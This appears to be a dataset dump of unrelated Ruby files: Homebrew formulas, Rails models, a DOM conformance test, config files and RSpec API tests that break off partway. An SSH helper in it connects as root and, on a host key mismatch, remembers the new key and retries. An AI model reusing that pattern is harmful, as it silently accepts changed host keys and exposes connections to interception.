contentType = getContentType()
preload(contentType, "staff", true)
end
###
# Runs the test case.
# @throws Throwable Any uncaught exception causes test to fail
#
def test_elementsetattributenomodificationallowederr
doc = nil
genderList = nil
gender = nil
entRef = nil
entElement = nil
doc = load_document("staff", true)
genderList = doc.getElementsByTagName("gender")
gender = genderList.item(2)
entRef = gender.firstChild()
assert_not_nil(entRef, "entRefNotNull")
entElement = entRef.firstChild()
assert_not_nil(entElement, "entElementNotNull")
begin
success = false;
begin
entElement.setAttribute("newAttr", "newValue")
rescue Taka::DOMException => ex
success = (ex.code == Taka::DOMException::NO_MODIFICATION_ALLOWED_ERR)
end
assert(success, "throw_NO_MODIFICATION_ALLOWED_ERR")
end
end
###
# Gets URI that identifies the test.
# @return uri identifier of test
#
def targetURI
"http://www.w3.org/2001/DOM-Test-Suite/tests/Level-1/elementsetattributenomodificationallowederr"
end
end
| 35.764706 | 201 | 0.7267 |
0130439cf1a3f3a2c9ee950d70bfba6c195cd2ca | 954 | class Udunits < Formula
desc "Unidata unit conversion library"
homepage "https://www.unidata.ucar.edu/software/udunits/"
url "ftp://ftp.unidata.ucar.edu/pub/udunits/udunits-2.2.26.tar.gz"
sha256 "368f4869c9c7d50d2920fa8c58654124e9ed0d8d2a8c714a9d7fdadc08c7356d"
bottle do
sha256 "5d06e98f43d762c488ee32fdafcd11c6a1ba1e1527fb176cd2558a465701bfc1" => :mojave
sha256 "9bb90283343d3490d247eda07024cbdfa68b1dbc5255d2697c73ed2e73a29799" => :high_sierra
sha256 "754d3116eb032cc012c164b0a5edea7432f6e6a4b2853a9b7153e560dfb9075a" => :sierra
sha256 "5fbd4d1d36e471bc71720b61a1d4a76b363e115fc71b74208fc5284883087bda" => :el_capitan
end
def install
system "./configure", "--disable-debug",
"--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
test do
assert_match(/1 kg = 1000 g/, shell_output("#{bin}/udunits2 -H kg -W g"))
end
end
| 38.16 | 93 | 0.726415 |
f763d372788c197d00b99e2c420a0c9104b0b633 | 45 | module Representatives::ClassroomsHelper
end
| 15 | 40 | 0.888889 |
ed1554d0dbb374361b3be328546af3d1fbc3a5c1 | 5,458 | class Subliminal < Formula
desc "Library to search and download subtitles"
homepage "https://subliminal.readthedocs.org"
url "https://github.com/Diaoul/subliminal/archive/1.0.1.tar.gz"
sha256 "b2db67d6a6d68c3fc5a2fda9ee5831879548c288af61de726cae508d72fc4816"
head "https://github.com/Diaoul/subliminal.git"
bottle do
cellar :any
sha256 "29d0af54b61269c0e371494ebb56429afc6a98e6e21423e692c25c367af2a07d" => :yosemite
sha256 "8f3eff7ac992dce702753f2058c1c9513567658d2928e5dc82634db5f8df07cc" => :mavericks
sha256 "419f7156a3b2cce921860d39dba17cdcb544b910c8223aa4e4fa1cf68a29950f" => :mountain_lion
end
depends_on :python if MacOS.version <= :snow_leopard
resource "pip" do
url "https://pypi.python.org/packages/source/p/pip/pip-7.1.0.tar.gz"
sha256 "d5275ba3221182a5dd1b6bcfbfc5ec277fb399dd23226d6fa018048f7e0f10f2"
end
resource "wsgiref" do
url "https://pypi.python.org/packages/source/w/wsgiref/wsgiref-0.1.2.zip"
sha256 "c7e610c800957046c04c8014aab8cce8f0b9f0495c8cd349e57c1f7cabf40e79"
end
resource "chardet" do
url "https://pypi.python.org/packages/source/c/chardet/chardet-2.3.0.tar.gz"
sha256 "e53e38b3a4afe6d1132de62b7400a4ac363452dc5dfcf8d88e8e0cce663c68aa"
end
resource "guessit" do
url "https://pypi.python.org/packages/source/g/guessit/guessit-0.10.3.tar.gz"
sha256 "d14ea0a2ea3413ec46119ea4d7a91b1f045761cfb3dc262c9dcd545742712dfe"
end
resource "requests" do
url "https://pypi.python.org/packages/source/r/requests/requests-2.7.0.tar.gz"
sha256 "398a3db6d61899d25fd4a06c6ca12051b0ce171d705decd7ed5511517b4bb93d"
end
resource "dogpile.cache" do
url "https://pypi.python.org/packages/source/d/dogpile.cache/dogpile.cache-0.5.6.tar.gz"
sha256 "f80544c5555f66cf7b5fc99f15431f3b35f78009bc6b03b58fe1724236bbc57b"
end
resource "beautifulsoup4" do
url "https://pypi.python.org/packages/source/b/beautifulsoup4/beautifulsoup4-4.4.0.tar.gz"
sha256 "fad91da88f69438b9ba939ab1b2cabaa31b1d914f1cccb4bb157a993ed2917f6"
end
resource "click" do
url "https://pypi.python.org/packages/source/c/click/click-4.1.tar.gz"
sha256 "e339ed09f25e2145314c902a870bc959adcb25653a2bd5cc1b48d9f56edf8ed8"
end
resource "enzyme" do
url "https://pypi.python.org/packages/source/e/enzyme/enzyme-0.4.1.tar.gz"
sha256 "f2167fa97c24d1103a94d4bf4eb20f00ca76c38a37499821049253b2059c62bb"
end
resource "pysrt" do
url "https://pypi.python.org/packages/source/p/pysrt/pysrt-1.0.1.tar.gz"
sha256 "5300a1584c8d15a1c49ef8880fa1ef7a4274ce3f24dde83ad581d12d875f6784"
end
resource "stevedore" do
url "https://pypi.python.org/packages/source/s/stevedore/stevedore-1.6.0.tar.gz"
sha256 "dab2aa31ec742f651e6a2fe0429560aebbbe0fb7fc462fa0ff565c8f5ff2ec25"
end
resource "six" do
url "https://pypi.python.org/packages/source/s/six/six-1.9.0.tar.gz"
sha256 "e24052411fc4fbd1f672635537c3fc2330d9481b18c0317695b46259512c91d5"
end
resource "babelfish" do
url "https://pypi.python.org/packages/source/b/babelfish/babelfish-0.5.4.tar.gz"
sha256 "6e4f41f185b30b81232589c10b059546f3320cc440c5987f182ee82ab1778b47"
end
resource "python-dateutil" do
url "https://pypi.python.org/packages/source/p/python-dateutil/python-dateutil-2.4.2.tar.gz"
sha256 "3e95445c1db500a344079a47b171c45ef18f57d188dffdb0e4165c71bea8eb3d"
end
resource "dogpile.core" do
url "https://pypi.python.org/packages/source/d/dogpile.core/dogpile.core-0.4.1.tar.gz"
sha256 "be652fb11a8eaf66f7e5c94d418d2eaa60a2fe81dae500f3743a863cc9dbed76"
end
resource "argparse" do
url "https://pypi.python.org/packages/source/a/argparse/argparse-1.3.0.tar.gz"
sha256 "b3a79a23d37b5a02faa550b92cbbbebeb4aa1d77e649c3eb39c19abf5262da04"
end
resource "pbr" do
url "https://pypi.python.org/packages/source/p/pbr/pbr-1.3.0.tar.gz"
sha256 "1a6f8d514fc11d2571c75c207d932c106f024f199b5f12d25f8ca022b026c59d"
end
resource "pyxdg" do
url "https://pypi.python.org/packages/source/p/pyxdg/pyxdg-0.25.tar.gz"
sha256 "81e883e0b9517d624e8b0499eb267b82a815c0b7146d5269f364988ae031279d"
end
resource "html5lib" do
url "https://pypi.python.org/packages/source/h/html5lib/html5lib-0.999999.tar.gz"
sha256 "e372b66f4997f8e1de970ea755d0a528d7222d2aa9bd55aac078c7ef39b8f6c3"
end
# not required by install_requires but provides additional UI when available
resource "colorlog" do
url "https://pypi.python.org/packages/source/c/colorlog/colorlog-2.6.0.tar.gz"
sha256 "0f03ae0128a1ac2e22ec6a6617efbd36ab00d4b2e1c49c497e11854cf24f1fe9"
end
def install
ENV.prepend_create_path "PYTHONPATH", libexec/"vendor/lib/python2.7/site-packages"
resources.each do |r|
r.stage do
system "python", *Language::Python.setup_install_args(libexec/"vendor")
end
end
# dogpile is a namespace package and .pth files aren't read from our
# vendor site-packages
touch libexec/"vendor/lib/python2.7/site-packages/dogpile/__init__.py"
ENV.prepend_create_path "PYTHONPATH", libexec/"lib/python2.7/site-packages"
system "python", *Language::Python.setup_install_args(libexec)
bin.install Dir[libexec/"bin/*"]
bin.env_script_all_files(libexec/"bin", :PYTHONPATH => ENV["PYTHONPATH"])
end
test do
mkdir ".config"
system "#{bin}/subliminal", "download", "-l", "en",
"--", "The.Big.Bang.Theory.S05E18.HDTV.x264-LOL.mp4"
end
end
| 38.43662 | 96 | 0.76878 |
913b534f52ffc36d479aafbe547f6903b45ebdee | 2,260 | # frozen_string_literal: true
module ActiveStorage
# Decorated proxy object representing of multiple attachments to a model.
class Attached::Many < Attached
delegate_missing_to :attachments
# Returns all the associated attachment records.
#
# All methods called on this proxy object that aren't listed here will automatically be delegated to +attachments+.
def attachments
change.present? ? change.attachments : record.public_send("#{name}_attachments")
end
# Returns all attached blobs.
def blobs
change.present? ? change.blobs : record.public_send("#{name}_blobs")
end
# Attaches one or more +attachables+ to the record.
#
# If the record is persisted and unchanged, the attachments are saved to
# the database immediately. Otherwise, they'll be saved to the DB when the
# record is next saved.
#
# document.images.attach(params[:images]) # Array of ActionDispatch::Http::UploadedFile objects
# document.images.attach(params[:signed_blob_id]) # Signed reference to blob from direct upload
# document.images.attach(io: File.open("/path/to/racecar.jpg"), filename: "racecar.jpg", content_type: "image/jpg")
# document.images.attach([ first_blob, second_blob ])
def attach(*attachables)
if record.persisted? && !record.changed?
record.public_send("#{name}=", blobs + attachables.flatten)
record.save
else
record.public_send("#{name}=", (change&.attachables || blobs) + attachables.flatten)
end
end
# Returns true if any attachments have been made.
#
# class Gallery < ApplicationRecord
# has_many_attached :photos
# end
#
# Gallery.new.photos.attached? # => false
def attached?
attachments.any?
end
# Deletes associated attachments without purging them, leaving their respective blobs in place.
def detach
attachments.delete_all if attached?
end
##
# :method: purge
#
# Directly purges each associated attachment (i.e. destroys the blobs and
# attachments and deletes the files on the service).
##
# :method: purge_later
#
# Purges each associated attachment through the queuing system.
end
end
| 33.731343 | 121 | 0.683186 |
7a5f7b157924f90155cb5ed96fc652c0f2e3b72d | 387 | class Bin < ActiveRecord::Base
def encode_id
rand = (1+rand(8)).to_s
id = (self.id + 1000).to_s
#logger.debug "enconding id"
#logger.debug "#{self.id}"
#logger.debug "#{id}"
#logger.debug "#{(id + rand)}"
#logger.debug "#{(id + rand).reverse}"
#logger.debug "#{(id + rand).reverse.to_i.to_s(36)}"
(id + rand).reverse.to_i.to_s(36)
end
end
| 21.5 | 56 | 0.573643 |
eda00ef2957ba9809760c7940b063414eb56dc81 | 1,007 | #!/usr/bin/env ruby
require 'net/ssh'
module SshCon
def self.connect(host)
opt = {
:keys => '/home/thirai/novakey01',
:passphrase => '',
:port => 22
}
Net::SSH.start(host, 'root', opt) do |ssh|
stderr = ""
ssh.exec!("echo test") do |channel, stream, data|
stderr << data if stream == :stderr
end
return stderr
end
rescue
stderr = "can not connect via ssh"
return stderr
end
end
def check_ssh(ipaddr, user, key)
begin
Net::SSH.start("#{ipaddr}", "#{user}", :keys => ["#{key}"], :passphrase => '', :timeout => 10) do |ssh|
return 'ok'
end
rescue Timeout::Error
@error = "Timed out"
rescue Errno::EHOSTUNREACH
@error = "Host unreachable"
rescue Errno::ECONNREFUSED
@error = "Connection refused"
rescue Net::SSH::AuthenticationFailed
@error = "Authentication failure"
rescue Net::SSH::HostKeyMismatch => e
puts "remembering new key: #{e.fingerprint}"
e.remember_host!
retry
end
end
| 22.886364 | 107 | 0.607746 |
5debe2ac5cd702f5cc1ebe781b1f98d4f7017b41 | 911 | #!/usr/bin/env ruby
require 'rubygems'
spec = Gem::Specification.new do |s|
s.name = 'm4dbi'
s.version = '0.6.3'
s.summary = 'Models (and More) for DBI'
s.description = 'M4DBI provides models, associations and some convenient extensions to Ruby DBI.'
s.homepage = 'http://purepistos.net/m4dbi'
s.rubyforge_project = 'm4dbi'
s.add_dependency( 'metaid' )
s.add_dependency( 'dbi' )
s.requirements << 'bacon (optional)'
s.authors = [ 'Pistos' ]
s.email = 'pistos at purepistos dot net'
#s.platform = Gem::Platform::RUBY
s.files = [
'HIM',
'READHIM',
'CHANGELOG',
'LICENCE',
*( Dir[ 'lib/**/*.rb', 'spec/**/*.rb' ] )
]
s.extra_rdoc_files = [
'HIM', 'READHIM', 'CHANGELOG', 'LICENCE',
]
s.test_files = Dir.glob( 'spec/*.rb' )
end
if $PROGRAM_NAME == __FILE__
Gem::Builder.new( spec ).build
end | 25.305556 | 101 | 0.582876 |
21d162cb1e2d7bf1c778e78b1b41341a47d104ef | 8,687 | # rubocop:disable Layout/LineLength, Lint/RedundantCopDisableDirective
# == Schema Information
#
# Table name: events
#
# id :integer not null, primary key
# additional_info :jsonb
# admin_notes :text
# age_restrictions_description :text
# author :string
# can_play_concurrently :boolean default(FALSE), not null
# con_mail_destination :string
# content_warnings :text
# description :text
# email :string
# length_seconds :integer not null
# minimum_age :integer
# organization :string
# participant_communications :text
# private_signup_list :boolean default(FALSE), not null
# registration_policy :jsonb
# short_blurb :text
# status :string default("active"), not null
# team_mailing_list_name :text
# title :string not null
# title_vector :tsvector
# url :text
# created_at :datetime
# updated_at :datetime
# convention_id :integer
# event_category_id :bigint not null
# owner_id :integer
# updated_by_id :integer
#
# Indexes
#
# index_events_on_convention_id (convention_id)
# index_events_on_event_category_id (event_category_id)
# index_events_on_owner_id (owner_id)
# index_events_on_title_vector (title_vector) USING gin
# index_events_on_updated_by_id (updated_by_id)
#
# Foreign Keys
#
# fk_rails_... (convention_id => conventions.id)
# fk_rails_... (event_category_id => event_categories.id)
# fk_rails_... (owner_id => users.id)
# fk_rails_... (updated_by_id => users.id)
#
# rubocop:enable Layout/LineLength, Lint/RedundantCopDisableDirective
# rubocop:disable Metrics/LineLength, Lint/RedundantCopDisableDirective
class Event < ApplicationRecord
include AgeRestrictions
include EventEmail
include FormResponse
include MarkdownIndexing
include OrderByTitle
include PgSearch::Model
STATUSES = Set.new(%w[active dropped])
CON_MAIL_DESTINATIONS = Set.new(%w[event_email gms])
pg_search_scope(
:title_prefix,
against: :title,
using: {
tsearch: {
dictionary: 'simple_unaccent',
prefix: true,
tsvector_column: 'title_vector'
}
}
)
indexable_markdown_field(:description_for_search) { description }
indexable_markdown_field(:short_blurb_for_search) { short_blurb }
multisearchable(
against: [
:title,
:author,
:organization,
:team_members_for_search,
:description_for_search,
:short_blurb_for_search
],
additional_attributes: ->(event) {
{ convention_id: event.convention_id, hidden_from_search: event.status == 'dropped' }
}
)
register_form_response_attrs :title,
:author,
:email,
:event_email,
:team_mailing_list_name,
:organization,
:url,
:length_seconds,
:can_play_concurrently,
:con_mail_destination,
:description,
:short_blurb,
:registration_policy,
:participant_communications,
:age_restrictions,
:age_restrictions_description,
:minimum_age,
:content_warnings
# Most events belong to the user who proposes it. Some (like ConSuite or
# Ops) are owned by the department head
belongs_to :owner, class_name: 'User', optional: true
# LARPs have GMs and Panels have Panelists
has_many :team_members, dependent: :destroy
# The user who last updated the event. Used for tracking
belongs_to :updated_by, class_name: 'User', optional: true
belongs_to :convention
belongs_to :event_category
has_many :maximum_event_provided_tickets_overrides, dependent: :destroy
has_many :provided_tickets,
class_name: 'Ticket',
inverse_of: 'provided_by_event',
foreign_key: 'provided_by_event_id'
has_many :event_ratings, dependent: :destroy
# Status specifies the status of the event. It must be one of
# "active" or "dropped".
validates :status, inclusion: { in: STATUSES }
validates :con_mail_destination, inclusion: { in: CON_MAIL_DESTINATIONS }
# All events for a Convention must have a unique title. Ignore any events
# that have a status of "Dropped". If they have a duplicate title we don't
# care.
validates :title, presence: true, uniqueness: {
scope: :convention,
conditions: -> { where.not(status: 'dropped') }
}
# The event's registration policy must also be valid.
validate :validate_registration_policy
# Single-run events have to have no more than one run
validate :single_run_events_must_have_no_more_than_one_run, unless: :bypass_single_event_run_check
# Making it slightly harder to change the registration policy unless you really know what
# you're doing
validate :registration_policy_cannot_change, unless: :allow_registration_policy_change
validate :event_category_must_be_from_same_convention
validates :length_seconds, numericality: { greater_than_or_equal_to: 0 }
# Runs specify how many instances of this event there are on the schedule.
# An event may have 0 or more runs.
has_many :runs, dependent: :destroy
has_one :event_proposal, required: false
has_many :form_response_changes, as: :response
after_commit :sync_team_mailing_list, on: [:create, :update]
STATUSES.each do |status|
scope status, -> { where(status: status) }
end
scope :regular, -> {
where(event_category_id: EventCategory.where(scheduling_ui: 'regular').select(:id))
}
scope :joins_rating_for_user_con_profile, ->(user_con_profile) do
if user_con_profile
joins(<<~SQL)
LEFT JOIN event_ratings ON (
events.id = event_ratings.event_id
AND user_con_profile_id = #{connection.quote(user_con_profile.id)}
)
SQL
else
self
end
end
scope :with_rating_for_user_con_profile, ->(user_con_profile, rating) do
if user_con_profile
rating_array = rating.is_a?(Array) ? rating : [rating]
joins_rating_for_user_con_profile(user_con_profile)
.where('COALESCE(event_ratings.rating, 0) IN (?)', rating_array)
else
self
end
end
scope :order_by_rating_for_user_con_profile, ->(user_con_profile, direction = nil) do
if user_con_profile
joins_rating_for_user_con_profile(user_con_profile)
.order(Arel.sql("COALESCE(event_ratings.rating, 0) #{direction || 'DESC'}"))
else
self
end
end
scope :with_runs_between, ->(convention, start, finish) do
where(id: convention.runs.between(start, finish).select(:event_id))
end
serialize :registration_policy, ActiveModelCoder.new('RegistrationPolicy')
attr_accessor :bypass_single_event_run_check, :allow_registration_policy_change
def to_param
"#{id}-#{title.parameterize}"
end
def to_liquid
EventDrop.new(self)
end
def form
event_category.event_form
end
def team_members_for_search
team_members.visible.includes(:user_con_profile).map(&:name)
end
def other_models_for_team_mailing_list_conflicts(model_class)
return super unless model_class == EventProposal
super.where.not(event_id: id)
end
private
def validate_registration_policy
return unless registration_policy
return if registration_policy.valid?
registration_policy.errors.each do |attribute, error|
errors.add "registration_policy.#{attribute}", error
end
end
def single_run_events_must_have_no_more_than_one_run
return unless event_category.single_run? && status == 'active'
return if runs.size <= 1
errors.add(:base, "#{event_category.name} events must have no more than one run")
end
def registration_policy_cannot_change
return if new_record?
return unless registration_policy_changed?
before, after = changes['registration_policy']
return if before == after # ActiveRecord is being overzealous about change detection
errors.add :registration_policy, "cannot be changed via ActiveRecord on an existing event. \
Use EventChangeRegistrationPolicyService instead."
end
def event_category_must_be_from_same_convention
return if convention == event_category.convention
errors.add :event_category, "is from #{event_category.convention.name} but this event is in \
#{convention.name}"
end
def sync_team_mailing_list
return unless SyncTeamMailingListService.mailgun
SyncTeamMailingListJob.perform_later(self)
end
end
| 31.136201 | 100 | 0.696098 |
edb8869418b218c460910100298e0fc26342fc52 | 547 | if Rails.env.production?
CarrierWave.configure do |config|
config.root = Rails.root.join('tmp') # adding these...
config.cache_dir = 'carrierwave' # ...two lines
config.fog_credentials = {
# Configuration for Amazon S3
:provider => 'AWS',
:aws_access_key_id => ENV['S3_ACCESS_KEY'], # required
:aws_secret_access_key => ENV['S3_SECRET_KEY'], # required
:region => 'us-east-2'
}
config.fog_directory = ENV['S3_BUCKET']
end
end
| 32.176471 | 85 | 0.568556 |
f777c2c15c46fc50e0a7189088037b672c83ba01 | 22,545 |
require "spec_helper"
describe "TEAMS API::" , :type => :api do
let (:team) {FactoryGirl.create(:team)}
let (:user) {team.users.first}
let (:project) { team.projects.first }
let (:admin) {FactoryGirl.create(:user, :admin)}
describe 'list all teams' do
context 'as a non-admin' do
before do
FactoryGirl.create(:team, users_count: 0)
header 'User-Token', user.user_tokens.first.token
get "/teams"
end
it 'responds successfully' do
expect(last_response.status).to eq 200
end
it 'should return all users teams' do
expect(json).to include('teams')
expect(json['teams'].count).to eq user.teams.count
end
it 'does not return all teams' do
expect(json).to include('teams')
expect(json['teams'].count).to_not eq Team.count
end
end
context 'as an admin' do
before do
3.times do
FactoryGirl.create(:team)
end
header 'User-Token', admin.user_tokens.first.token
get "/teams"
end
it 'responds successfully', :show_in_doc do
expect(last_response.status).to eq 200
end
it 'should return all teams' do
expect(json).to include('teams')
expect(json['teams'].count).to eq Team.count
end
end
context 'without user token' do
before do
header 'User-Token', nil
get "/teams"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
get "/teams"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
get "/teams"
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'get team details' do
context 'with invalid team id' do
before do
header 'User-Token', user.user_tokens.first.token
get "/teams/-1"
end
it_behaves_like 'a not found request'
end
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
header 'User-Token', admin.user_tokens.first.token
get "/teams/#{other_team.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should access any team regardless of team' do
expect(last_response.status).to eq 200
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
end
it 'should be able to access team viewable by user' do
get "/teams/#{team.id}"
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should not be able to access team not viewable by user' do
other_team = FactoryGirl.create(:team, users_count: 0)
get "/teams/#{other_team.id}"
expect(last_response.status).to eq 403
expect(json).to include('error')
end
end
context 'without user token' do
before do
header 'User-Token', nil
get "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
get "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
get "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'create new team' do
context 'as an admin' do
before do
header 'User-Token', admin.user_tokens.first.token
end
it 'responds successfully', :show_in_doc do
post "/teams", {team: FactoryGirl.attributes_for(:team)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 200
expect(json).to include 'team'
end
it 'should create team' do
expect { post "/teams", {team: FactoryGirl.attributes_for(:team)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' } }
.to change { Team.count }.by(1)
end
context 'without' do
it 'description should fail' do
post "/teams", {team: FactoryGirl.attributes_for(:team, description: nil)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include('error')
end
it 'name should fail' do
post "/teams", {team: FactoryGirl.attributes_for(:team, name: nil)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include('error')
end
end
end
context 'with duplicate name' do
it 'should return an error' do
header 'User-Token', admin.user_tokens.first.token
post "/teams", {team: {name: team.name}}.to_json , { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include 'error'
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
post "/teams", FactoryGirl.attributes_for(:team).to_json , { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'a forbidden request'
end
context 'without user token' do
before do
header 'User-Token', nil
post "/teams", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
post "/teams", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
post "/teams", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'update existing team' do
context 'as an admin' do
before do
header 'User-Token', admin.user_tokens.first.token
end
it 'responds successfully', :show_in_doc do
put "/teams/#{team.id}", {team: {name: 'Some New Name'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 200
expect(json).to include 'team'
end
context 'should update' do
it 'name' do
team = FactoryGirl.create(:team)
put "/teams/#{team.id}", {team: {name: 'New Name'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(json['team']).to include 'name'
expect(json['team']['name']).to eq ('New Name')
expect(Team.last.name).to eq ('New Name')
end
it 'description' do
team = FactoryGirl.create(:team)
put "/teams/#{team.id}", {team: {description: 'Some new description'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(json['team']).to include 'description'
expect(json['team']['description']).to eq ('Some new description')
expect(Team.last.description).to eq ('Some new description')
end
end
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
put "/teams/-1", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'a not found request'
end
context 'with duplicate name' do
it 'should return an error' do
name = FactoryGirl.create(:team).name
header 'User-Token', admin.user_tokens.first.token
post "/teams", {team: {name: name}}.to_json , { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include 'error'
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
put "/teams/#{team.id}", {team: {name: 'A New Name'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'a forbidden request'
end
context 'without user token' do
before do
header 'User-Token', nil
put "/teams/#{team.id}", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
put "/teams/#{team.id}", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
put "/teams/#{team.id}", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'delete existing team' do
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
delete "/teams/#{team.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid id' do
before do
header 'User-Token', admin.user_tokens.first.token
delete "/teams/-1"
end
it_behaves_like 'a not found request'
end
context 'as an admin' do
before do
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{team.id}"
end
it 'responds succesfully' do
expect(last_response.status).to eq 200
end
it 'returns user details', :show_in_doc do
expect(json).to include('team')
end
end
context 'without user token' do
before do
header 'User-Token', nil
delete "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
delete "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'add user to team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
user = FactoryGirl.create(:user)
@team_count = other_team.users.count
header 'User-Token', admin.user_tokens.first.token
post "/teams/#{other_team.id}/user/#{user.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('users')
expect(json['team']['users'].count).to eq (@team_count +1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/-1/user/#{user.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid user id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
header 'User-Token', nil
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with user already on team' do
before do
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a bad request'
end
end
describe 'add project to team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
project = FactoryGirl.create(:project)
@team_count = other_team.projects.count
header 'User-Token', admin.user_tokens.first.token
post "/teams/#{other_team.id}/project/#{project.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('projects')
expect(json['team']['projects'].count).to eq (@team_count +1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/-1/project/#{project.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid project id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
